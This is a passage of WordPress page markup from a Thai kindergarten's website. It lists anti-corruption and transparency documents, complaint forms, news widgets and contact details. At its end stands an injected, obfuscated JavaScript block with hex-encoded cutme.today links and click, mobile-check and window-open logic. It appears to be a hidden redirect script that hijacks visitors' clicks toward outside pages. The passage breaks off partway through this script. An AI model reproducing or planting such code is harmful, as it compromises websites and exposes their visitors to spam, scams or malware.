data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=sharing\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1l-VlfXu6thxBFvL0JpgAcCUrTrqNNp4G/view?usp=sharing\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1AeKeechkWj0RdYe5xvMgrFXsQiTu26xV/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\